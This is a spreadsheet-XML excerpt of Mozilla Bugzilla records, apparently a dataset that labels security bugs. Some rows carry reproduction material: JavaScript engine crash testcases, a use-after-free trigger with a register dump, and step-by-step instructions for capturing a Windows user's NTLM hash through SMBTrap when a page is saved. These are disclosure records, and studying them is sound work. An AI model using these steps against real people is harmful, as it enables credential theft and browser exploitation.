      <c r="W3133" t="inlineStr">
        <is>
          <t>Created attachment 780586
testcase (crashes firefox)
The attached testcase crashes the ASAN build of Firefox with the attached testcase.
It involves event handlers and exchange of __proto__ attributes, similar to Bug 831090.</t>
        </is>
      </c>
      <c r="X3133" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3134">
      <c r="A3134" t="n">
        <v>876458</v>
      </c>
      <c r="B3134" t="inlineStr">
        <is>
          <t>2013-05-27 09:07:17 -0700</t>
        </is>
      </c>
      <c r="C3134" t="inlineStr">
        <is>
          <t>IonMonkey: Assertion failure: str, at ./dist/include/js/Value.h:640 or Assertion failure: hasBase(), at vm/String.h:948 or Crash on Heap or Crash [@ StringMatch]</t>
        </is>
      </c>
      <c r="D3134" t="inlineStr">
        <is>
          <t>2014-11-19 19:48:31 -0800</t>
        </is>
      </c>
      <c r="E3134" t="n">
        <v>1</v>
      </c>
      <c r="F3134" t="n">
        <v>1</v>
      </c>
      <c r="G3134" t="n">
        <v>3</v>
      </c>
      <c r="H3134" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3134" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3134" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3134" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3134" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3134" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3134" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3134" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3134" t="inlineStr">
        <is>
          <t>[jsbugmon:update,ignore][adv-main22+]</t>
        </is>
      </c>
      <c r="Q3134" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3134" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3134" t="inlineStr">
        <is>
          <t>mozilla24</t>
        </is>
      </c>
      <c r="T3134" t="n">
        <v>1</v>
      </c>
      <c r="U3134" t="n">
        <v>0</v>
      </c>
      <c r="V3134" t="n">
        <v>19</v>
      </c>
      <c r="W3134" t="inlineStr">
        <is>
          <t>The following testcase asserts on mozilla-central revision a39263b0c896 (run with --ion-eager):
var y = "";
test();
function test() {
  y;
  // Using the next line instead of the unescape will assert
  //y.toString();
  unescape('x' + y);
}
y = y * 2;
test();</t>
        </is>
      </c>
      <c r="X3134" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3135">
      <c r="A3135" t="n">
        <v>1447087</v>
      </c>
      <c r="B3135" t="inlineStr">
        <is>
          <t>2018-03-19 11:40:06 -0700</t>
        </is>
      </c>
      <c r="C3135" t="inlineStr">
        <is>
          <t>Saving web page embedding file: resources allows accessing SMB resources</t>
        </is>
      </c>
      <c r="D3135" t="inlineStr">
        <is>
          <t>2024-05-30 09:44:04 -0700</t>
        </is>
      </c>
      <c r="E3135" t="n">
        <v>1</v>
      </c>
      <c r="F3135" t="n">
        <v>1</v>
      </c>
      <c r="G3135" t="n">
        <v>3</v>
      </c>
      <c r="H3135" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3135" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3135" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K3135" t="inlineStr">
        <is>
          <t>59 Branch</t>
        </is>
      </c>
      <c r="L3135" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3135" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3135" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3135" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3135" t="inlineStr">
        <is>
          <t>[adv-main63+]</t>
        </is>
      </c>
      <c r="Q3135" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R3135" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3135" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3135" t="n">
        <v>1</v>
      </c>
      <c r="U3135" t="n">
        <v>0</v>
      </c>
      <c r="V3135" t="n">
        <v>24</v>
      </c>
      <c r="W3135" t="inlineStr">
        <is>
          <t>Created attachment 8960284
poc.zip
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:59.0) Gecko/20100101 Firefox/59.0
Build ID: 20180315233128
Steps to reproduce:
Loading a file: resource is blocked when viewing pages over HTTP/HTTPS. However, when saving the page, any embedded file: resources are accessed. This may expose the user to SMB Relay Attacks, allowing to steal Windows user credentials.
Steps to reproduce:
Some definitions:
  Victim pc: the "victim's pc".
  HTTP server: a remote machine running a webserver.
  SMB server: a remote machine hosting "smbtrap", a Python-based SMB server that steals Windows user credentials.
1. HTTP server: From the attached ZIP, upload poc.html to this machine, so it can be accessed through e.g.
    http://192.168.1.128/poc.html
2. SMB server: Make sure to use Python 2.7.x. Also, install the Tornado 4.4.2 package, e.g. through "pip":
    sudo pip install tornado==4.4.2
3. SMB server: Make sure the host machine has the IP address 192.168.1.128 (or change the hardcoded address in poc.html).
4. SMB server: Download "smbtrap2.py" and "quickcrack.py" from
    https://github.com/CylanceSPEAR/SMBTrap/tree/master/smbtrap
and run SMBtrap through
    sudo python smbtrap2.py
5. Victim pc: Open Firefox, and navigate to
    http://192.168.1.128/poc.html
6. Victim pc: Save the web page to disk (File &gt; Save Page As)
7. Victim pc: Observe that SMBtrap receives the user's username and NTLM password hash.
   See also attached screenshot "smbtrap_output.png" (in the ZIP) for example output.
   Note: quickcrack.py contains a small "dictionary" for demonstration purposes. If the victim's password is one of those listed, SMBtrap will be able to derive the actual password from the NTLM hash.
Actual results:
Firefox accesses the file: resource, which is a path to an SMB resource. This may expose the user to SMB Relay attacks.
Expected results:
Firefox should not have accessed the file: resource when the web page is served over HTTP/HTTPS.</t>
        </is>
      </c>
      <c r="X3135" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3136">
      <c r="A3136" t="n">
        <v>57960</v>
      </c>
      <c r="B3136" t="inlineStr">
        <is>
          <t>2000-10-25 11:27:15 -0700</t>
        </is>
      </c>
      <c r="C3136" t="inlineStr">
        <is>
          <t>Need to update the Linux jre.xpi to make the link to the new location of libjavaplugin_oji.so</t>
        </is>
      </c>
      <c r="D3136" t="inlineStr">
        <is>
          <t>2008-07-31 02:11:29 -0700</t>
        </is>
      </c>
      <c r="E3136" t="n">
        <v>1</v>
      </c>
      <c r="F3136" t="n">
        <v>1</v>
      </c>
      <c r="G3136" t="n">
        <v>2</v>
      </c>
      <c r="H3136" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3136" t="inlineStr">
        <is>
          <t>SeaMonkey</t>
        </is>
      </c>
      <c r="J3136" t="inlineStr">
        <is>
          <t>Installer</t>
        </is>
      </c>
      <c r="K3136" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3136" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3136" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3136" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3136" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3136" t="inlineStr">
        <is>
          <t>[rtm++]</t>
        </is>
      </c>
      <c r="Q3136" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3136" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3136" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3136" t="n">
        <v>1</v>
      </c>
      <c r="U3136" t="n">
        <v>0</v>
      </c>
      <c r="V3136" t="n">
        <v>24</v>
      </c>
      <c r="W3136" t="inlineStr">
        <is>
          <t>After talking to Sun's Java Plugin P-team, and Samir, I am filing this bug to 
ask Samir to implement option 2:
Solution #2:
------------
Change the jre.xpi's install script to make a symlink to the lib in the "ns600"
directory.  This means we'll need a code change and checkin.  Concerned folks
will need to file a *new* bug since this is a new problem (against me I suppose)
and lobby the PDT to allow me to check this in if we go with this solution.
FWIW, this 6 character change is low risk and trivial.
See bug 57004 for more information.</t>
        </is>
      </c>
      <c r="X3136" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3137">
      <c r="A3137" t="n">
        <v>1329403</v>
      </c>
      <c r="B3137" t="inlineStr">
        <is>
          <t>2017-01-07 04:17:23 -0800</t>
        </is>
      </c>
      <c r="C3137" t="inlineStr">
        <is>
          <t>BaseMediaResource::ModifyLoadFlags Use-After-Free using MP4 video.</t>
        </is>
      </c>
      <c r="D3137" t="inlineStr">
        <is>
          <t>2024-05-30 09:24:49 -0700</t>
        </is>
      </c>
      <c r="E3137" t="n">
        <v>1</v>
      </c>
      <c r="F3137" t="n">
        <v>1</v>
      </c>
      <c r="G3137" t="n">
        <v>3</v>
      </c>
      <c r="H3137" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3137" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3137" t="inlineStr">
        <is>
          <t>Audio/Video: Playback</t>
        </is>
      </c>
      <c r="K3137" t="inlineStr">
        <is>
          <t>53 Branch</t>
        </is>
      </c>
      <c r="L3137" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3137" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3137" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3137" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3137" t="inlineStr">
        <is>
          <t>[adv-main51+][adv-esr45.7+]</t>
        </is>
      </c>
      <c r="Q3137" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3137" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3137" t="inlineStr">
        <is>
          <t>mozilla53</t>
        </is>
      </c>
      <c r="T3137" t="n">
        <v>1</v>
      </c>
      <c r="U3137" t="n">
        <v>0</v>
      </c>
      <c r="V3137" t="n">
        <v>49</v>
      </c>
      <c r="W3137" t="inlineStr">
        <is>
          <t>Created attachment 8824656
test.html
User Agent: Mozilla/5.0 (X11; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0 SeaMonkey/2.46
Build ID: 20161229190117
Steps to reproduce:
  Download the attached mp4 video file and create an iframe tag with the src pointing to it, 
then removing the iframe nodes and doing a document.write in the main window right after can cause the media resource 
chanel used to download the mp4 to be freed and reused in a short time inside this new document.
  It doesn't crash if using timers or events so I had to wait in an alert or sync XMLHttpRequestt for the object deletion,
apparently as stated here https://dxr.mozilla.org/mozilla-central/source/dom/media/MediaResource.h#438, it can only be 
accessed from the main thread. 
  I'm reproducing it waiting 10 seconds before closing the alert, it's an arbitrary time. The basic idea is that it only continues
execution after a call to MediaResource::Destroy().
Using the testcase it only crashes using mp4 files.
Tested with a Nightly build 32bit version:
Name        Firefox
Version     53.0a1
Build ID    20161201030205
Actual results:
(910.da0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=e5e5e5e5 ebx=00000001 ecx=8374b9ee edx=00000015 esi=1786c02c edi=176dac40
eip=69fe630a esp=003bf0dc ebp=003bf0f8 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
xul!mozilla::BaseMediaResource::ModifyLoadFlags+0x5e:
69fe630a 8b08            mov     ecx,dword ptr [eax]  ds:002b:e5e5e5e5=????????
69fe630c ff5130          call    dword ptr [ecx+30h]</t>
        </is>
      </c>
      <c r="X3137" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3138">
      <c r="A3138" t="n">
        <v>909494</v>
      </c>
      <c r="B3138" t="inlineStr">
        <is>
          <t>2013-08-26 13:20:28 -0700</t>
        </is>
      </c>
      <c r="C3138" t="inlineStr">
        <is>
          <t>Crash with SIGTRAP with ParallelArray and --ion-check-range-analysis</t>
        </is>
      </c>
      <c r="D3138" t="inlineStr">
        <is>
          <t>2015-06-30 14:30:10 -0700</t>
        </is>
      </c>
      <c r="E3138" t="n">
        <v>1</v>
      </c>
      <c r="F3138" t="n">
        <v>1</v>
      </c>
      <c r="G3138" t="n">
        <v>3</v>
      </c>
      <c r="H3138" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3138" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3138" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3138" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3138" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3138" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3138" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3138" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3138" t="inlineStr">
        <is>
          <t>[jsbugmon:][adv-main24+]</t>
        </is>
      </c>
      <c r="Q3138" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3138" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3138" t="inlineStr">
        <is>
          <t>mozilla26</t>
        </is>
      </c>
      <c r="T3138" t="n">
        <v>1</v>
      </c>
      <c r="U3138" t="n">
        <v>0</v>
      </c>
      <c r="V3138" t="n">
        <v>38</v>
      </c>
      <c r="W3138" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 4887845b1142 (threadsafe build, run with --fuzzing-safe --ion-check-range-analysis):
assertArraySeqParResultsEq(range(0, 1024), "filter", function(e, i) { return (i % (1.1)) != 0; });
function range(n, m) {
  var result = [];
  for (var i = n; i &lt; m; i++)
    result.push(i);
  return result;
}
function assertArraySeqParResultsEq(arr, op, func) {
  arr[op].apply(arr, [func]);
}</t>
        </is>
      </c>
      <c r="X3138" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3139">
      <c r="A3139" t="n">
        <v>657070</v>
      </c>
      <c r="B3139" t="inlineStr">
        <is>
          <t>2011-05-13 16:44:38 -0700</t>
        </is>
      </c>
      <c r="C3139" t="inlineStr">
        <is>
          <t>Users can search by group</t>
        </is>
      </c>
      <c r="D3139" t="inlineStr">
        <is>
          <t>2012-04-19 20:35:01 -0700</t>
        </is>
      </c>
      <c r="E3139" t="n">
        <v>1</v>
      </c>
      <c r="F3139" t="n">
        <v>1</v>
      </c>
      <c r="G3139" t="n">
        <v>5</v>
      </c>
      <c r="H3139" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3139" t="inlineStr">
        <is>
          <t>Participation Infrastructure</t>
        </is>
      </c>
      <c r="J3139" t="inlineStr">
        <is>
          <t>Phonebook</t>
        </is>
      </c>
      <c r="K3139" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3139" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3139" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3139" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3139" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3139" t="inlineStr"/>
      <c r="Q3139" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3139" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3139" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3139" t="n">
        <v>1</v>
      </c>
      <c r="U3139" t="n">
        <v>0</v>
      </c>
      <c r="V3139" t="n">
        <v>5</v>
      </c>
      <c r="W3139" t="inlineStr">
        <is>
          <t>Requirements/spec upcoming</t>
        </is>
      </c>
      <c r="X3139" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3140">
      <c r="A3140" t="n">
        <v>1279216</v>
      </c>
      <c r="B3140" t="inlineStr">
        <is>
          <t>2016-06-09 06:12:52 -0700</t>
        </is>
      </c>
      <c r="C3140" t="inlineStr">
        <is>
          <t>Crash in operator new | nsTArray_base&lt;T&gt;::ShiftData&lt;T&gt; | nsTArray_Impl&lt;T&gt;::InsertElementAt&lt;T&gt; | mozilla::a11y::Accessible::InsertChildAt</t>
        </is>
      </c>
      <c r="D3140" t="inlineStr">
        <is>
          <t>2016-07-20 08:42:40 -0700</t>
        </is>
      </c>
      <c r="E3140" t="n">
        <v>1</v>
      </c>
      <c r="F3140" t="n">
        <v>1</v>
      </c>
      <c r="G3140" t="n">
        <v>3</v>
      </c>
      <c r="H3140" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3140" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3140" t="inlineStr">
        <is>
          <t>Disability Access APIs</t>
        </is>
      </c>
      <c r="K3140" t="inlineStr">
        <is>
          <t>48 Branch</t>
        </is>
      </c>
      <c r="L3140" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3140" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N3140" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3140" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3140" t="inlineStr"/>
      <c r="Q3140" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3140" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3140" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3140" t="n">
        <v>1</v>
      </c>
      <c r="U3140" t="n">
        <v>0</v>
      </c>
      <c r="V3140" t="n">
        <v>12</v>
      </c>
      <c r="W3140" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-dc36bfc6-7ee0-4861-97bd-e05fe2160609.
=============================================================
Crashing Thread (0)
Frame 	Module 	Signature 	Source
0 	msvcr120.dll 	operator new(unsigned int) 	
1 	xul.dll 	nsTArray_base&lt;nsTArrayInfallibleAllocator, nsTArray_CopyWithMemutils&gt;::ShiftData&lt;nsTArrayInfallibleAllocator&gt;(unsigned int, unsigned int, unsigned int, unsigned int, unsigned int) 	obj-firefox/dist/include/nsTArray-inl.h:272
2 	xul.dll 	nsTArray_Impl&lt;nsTableColFrame*, nsTArrayInfallibleAllocator&gt;::InsertElementAt&lt;nsTableColFrame*, nsTArrayInfallibleAllocator&gt;(unsigned int, nsTableColFrame*&amp;&amp;) 	obj-firefox/dist/include/nsTArray.h:1407
3 	xul.dll 	mozilla::a11y::Accessible::InsertChildAt(unsigned int, mozilla::a11y::Accessible*) 	accessible/generic/Accessible.cpp:2071
4 	xul.dll 	mozilla::a11y::HyperTextAccessible::InsertChildAt(unsigned int, mozilla::a11y::Accessible*) 	accessible/generic/HyperTextAccessible.cpp:1916
5 	xul.dll 	mozilla::a11y::Accessible::InsertAfter(mozilla::a11y::Accessible*, mozilla::a11y::Accessible*) 	accessible/generic/Accessible.h:390
6 	xul.dll 	mozilla::a11y::DocAccessible::ProcessContentserted(mozilla::a11y::Accessible*, nsIContent*) 	accessible/generic/DocAccessible.cpp:1827
7 	xul.dll 	mozilla::a11y::NotificationController::WillRefresh(mozilla::TimeStamp) 	accessible/base/NotificationController.cpp:319
8 	xul.dll 	nsRefreshDriver::Tick(__int64, mozilla::TimeStamp) 	layout/base/nsRefreshDriver.cpp:1698
9 	xul.dll 	mozilla::RefreshDriverTimer::TickDriver(nsRefreshDriver*, __int64, mozilla::TimeStamp) 	layout/base/nsRefreshDriver.cpp:274
10 	xul.dll 	mozilla::RefreshDriverTimer::TickRefreshDrivers(__int64, mozilla::TimeStamp, nsTArray&lt;RefPtr&lt;nsRefreshDriver&gt; &gt;&amp;) 	layout/base/nsRefreshDriver.cpp:246
11 	xul.dll 	mozilla::RefreshDriverTimer::Tick(__int64, mozilla::TimeStamp) 	layout/base/nsRefreshDriver.cpp:264
12 	xul.dll 	mozilla::VsyncRefreshDriverTimer::RunRefreshDrivers(mozilla::TimeStamp) 	layout/base/nsRefreshDriver.cpp:588
13 	xul.dll 	mozilla::BaseTimeDuration&lt;mozilla::TimeDurationValueCalculator&gt;::FromMilliseconds(double) 	obj-firefox/dist/include/mozilla/TimeStamp.h:132
14 	xul.dll 	nsThread::ProcessNextEvent(bool, bool*) 	xpcom/threads/nsThread.cpp:994
[Tracking Requested - why for this release]:
this crash signature is regressing in 48 builds - in early data for 48.0b1 this signature is at #10 with 1.2% of all crashes.</t>
        </is>
      </c>
      <c r="X3140" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3141">
      <c r="A3141" t="n">
        <v>1625</v>
      </c>
      <c r="B3141" t="inlineStr">
        <is>
          <t>1998-11-24 20:56:16 -0800</t>
        </is>
      </c>
      <c r="C3141" t="inlineStr">
        <is>
          <t>ss: (xp)viewer.exe won't launch due to missing libreg32.dll</t>
        </is>
      </c>
      <c r="D3141" t="inlineStr">
        <is>
          <t>1999-03-03 17:15:03 -0800</t>
        </is>
      </c>
      <c r="E3141" t="n">
        <v>1</v>
      </c>
      <c r="F3141" t="n">
        <v>1</v>
      </c>
      <c r="G3141" t="n">
        <v>6</v>
      </c>
      <c r="H3141" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3141" t="inlineStr">
        <is>
          <t>MozillaClassic Graveyard</t>
        </is>
      </c>
      <c r="J3141" t="inlineStr">
        <is>
          <t>Windows FE</t>
        </is>
      </c>
      <c r="K3141" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3141" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3141" t="inlineStr">
        <is>
          <t>Windows 95</t>
        </is>
      </c>
      <c r="N3141" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3141" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3141" t="inlineStr"/>
      <c r="Q3141" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3141" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3141" t="inlineStr">
        <is>
          <t>M1</t>
        </is>
      </c>
      <c r="T3141" t="n">
        <v>1</v>
      </c>
      <c r="U3141" t="n">
        <v>0</v>
      </c>
      <c r="V3141" t="n">
        <v>5</v>
      </c>
      <c r="W3141" t="inlineStr">
        <is>
          <t>As above, using the Nov 24 build.</t>
        </is>
      </c>
      <c r="X3141" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3142">
      <c r="A3142" t="n">
        <v>1109552</v>
      </c>
      <c r="B3142" t="inlineStr">
        <is>
          <t>2014-12-10 02:44:00 -0800</t>
        </is>
      </c>
      <c r="C3142" t="inlineStr">
        <is>
          <t>Mismatched free() / delete / delete [] in webrtc::VPMContentAnalysis::Release()</t>
        </is>
      </c>
      <c r="D3142" t="inlineStr">
        <is>
          <t>2016-06-04 16:12:50 -0700</t>
        </is>
      </c>
      <c r="E3142" t="n">
        <v>1</v>
      </c>
      <c r="F3142" t="n">
        <v>1</v>
      </c>
      <c r="G3142" t="n">
        <v>3</v>
      </c>
      <c r="H3142" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3142" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3142" t="inlineStr">
        <is>
          <t>WebRTC</t>
        </is>
      </c>
      <c r="K3142" t="inlineStr">
        <is>
          <t>34 Branch</t>
        </is>
      </c>
      <c r="L3142" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3142" t="inlineStr">
        <is>
          <t>Windows 8</t>
        </is>
      </c>
      <c r="N3142" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3142" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3142" t="inlineStr">
        <is>
          <t>[adv-main37+]</t>
        </is>
      </c>
      <c r="Q3142" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3142" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3142" t="inlineStr">
        <is>
          <t>mozilla37</t>
        </is>
      </c>
      <c r="T3142" t="n">
        <v>1</v>
      </c>
      <c r="U3142" t="n">
        <v>0</v>
      </c>
      <c r="V3142" t="n">
        <v>21</v>
      </c>
      <c r="W3142" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Build ID: 20141126041045
Actual results:
==6262== Mismatched free() / delete / delete []
==6262==    at 0x4C2C2BC: operator delete(void*) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==6262==    by 0x9714343: webrtc::VPMContentAnalysis::Release() (scoped_ptr.h:154)
==6262==    by 0x97153DF: webrtc::VPMFramePreprocessor::Reset() (frame_preprocessor.cc:41)
==6262==    by 0x971567D: webrtc::VPMFramePreprocessor::~VPMFramePreprocessor() (frame_preprocessor.cc:29)
==6262==    by 0x9715DE0: webrtc::VideoProcessingModuleImpl::~VideoProcessingModuleImpl() (video_processing_impl.cc:75)
==6262==    by 0x9715E16: webrtc::VideoProcessingModuleImpl::~VideoProcessingModuleImpl() (video_processing_impl.cc:79)
==6262==    by 0x9716198: webrtc::VideoProcessingModule::Destroy(webrtc::VideoProcessingModule*) (video_processing_impl.cc:46)
==6262==    by 0x96D967B: webrtc::ViEEncoder::~ViEEncoder() (vie_encoder.cc:309)
==6262==    by 0x96D9792: webrtc::ViEEncoder::~ViEEncoder() (vie_encoder.cc:311)
==6262==    by 0x96D335E: webrtc::ViEChannelManager::DeleteChannel(int) (vie_channel_manager.cc:293)
==6262==    by 0x96C69B3: webrtc::ViEBaseImpl::DeleteChannel(int) (vie_base_impl.cc:216)
==6262==    by 0x845460D: mozilla::WebrtcVideoConduit::~WebrtcVideoConduit() (VideoConduit.cpp:140)
==6262==  Address 0x850860d0 is 0 bytes inside a block of size 307,200 alloc'd
==6262==    at 0x4C2B800: operator new[](unsigned long) (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==6262==    by 0x9714552: webrtc::VPMContentAnalysis::Initialize(int, int) (content_analysis.cc:129)
==6262==    by 0x971469B: webrtc::VPMContentAnalysis::ComputeContentMetrics(webrtc::I420VideoFrame const&amp;) (content_analysis.cc:58)
==6262==    by 0x9715662: webrtc::VPMFramePreprocessor::PreprocessFrame(webrtc::I420VideoFrame const&amp;, webrtc::I420VideoFrame**) (frame_preprocessor.cc:135)
==6262==    by 0x9716103: webrtc::VideoProcessingModuleImpl::PreprocessFrame(webrtc::I420VideoFrame const&amp;, webrtc::I420VideoFrame**) (video_processing_impl.cc:207)
==6262==    by 0x96D80D9: webrtc::ViEEncoder::DeliverFrame(int, webrtc::I420VideoFrame*, int, unsigned int const*) (vie_encoder.cc:657)
==6262==    by 0x96DB02B: webrtc::ViEFrameProviderBase::DeliverFrame(webrtc::I420VideoFrame*, int, unsigned int const*) (vie_frame_provider_base.cc:61)
==6262==    by 0x96C9EF5: webrtc::ViECapturer::DeliverI420Frame(webrtc::I420VideoFrame*) (vie_capturer.cc:630)
==6262==    by 0x96CACBB: webrtc::ViECapturer::ViECaptureProcess() (vie_capturer.cc:562)
==6262==    by 0x96CACCA: webrtc::ViECapturer::ViECaptureThreadFunction(void*) (vie_capturer.cc:552)
==6262==    by 0x974217A: webrtc::ThreadPosix::Run() (thread_posix.cc:379)
==6262==    by 0x974227E: StartThread (thread_posix.cc:106)</t>
        </is>
      </c>
      <c r="X3142" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3143">
      <c r="A3143" t="n">
        <v>532046</v>
      </c>
      <c r="B3143" t="inlineStr">
        <is>
          <t>2009-12-01 00:10:54 -0800</t>
        </is>
      </c>
      <c r="C3143" t="inlineStr">
        <is>
          <t>Request to move Solaris contrib. builds for Firefox 3.6b4 to bouncer</t>
        </is>
      </c>
      <c r="D3143" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E3143" t="n">
        <v>1</v>
      </c>
      <c r="F3143" t="n">
        <v>1</v>
      </c>
      <c r="G3143" t="n">
        <v>5</v>
      </c>
      <c r="H3143" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3143" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J3143" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3143" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3143" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3143" t="inlineStr">
        <is>
          <t>Solaris</t>
        </is>
      </c>
      <c r="N3143" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3143" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3143" t="inlineStr"/>
